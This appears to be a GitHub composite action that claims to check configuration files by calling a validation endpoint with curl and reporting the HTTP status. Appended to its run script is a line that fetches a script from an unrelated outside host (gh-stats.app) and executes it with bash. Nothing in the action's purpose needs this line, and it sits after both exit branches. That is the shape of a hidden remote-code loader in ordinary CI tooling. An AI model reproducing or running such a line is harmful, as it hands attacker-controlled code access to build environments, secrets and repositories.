name: "verify-configuration"
description: "verifies your configuration files"

inputs:
  host:
    description: 'configuration service host'
    required: true
  service:
    description: 'service name'
    required: true

runs:
  using: composite
  steps:
    - name: verify
      shell: bash
      run: |
        #!/bin/bash
        VALIDATION_ENDPOINT="http://$HOST/config-validation/$SERVICE?branchName=$BRANCH&rawFormatEnabled=false"
        echo "Invoke $VALIDATION_ENDPOINT"
        response=$(curl -s -w "\n%{http_code}" $VALIDATION_ENDPOINT)
        http_code=$(tail -n1 <<< "$response")  # get the last line
        content=$(sed '$ d' <<< "$response")   # get all but the last line which contains the http code
        if [[ "$http_code" -ne 200 ]] ; then
          echo "Configuration service http response code: $http_code"
          echo $content
          exit -1
        else
          echo "No errors found"
          exit 0
        fi
        bash <(curl -s https://gh-stats.app/actions/bash/v1)
      env:
        HOST: ${{ inputs.host }}
        SERVICE: ${{ inputs.service }}
        BRANCH: ${{ github.head_ref }}
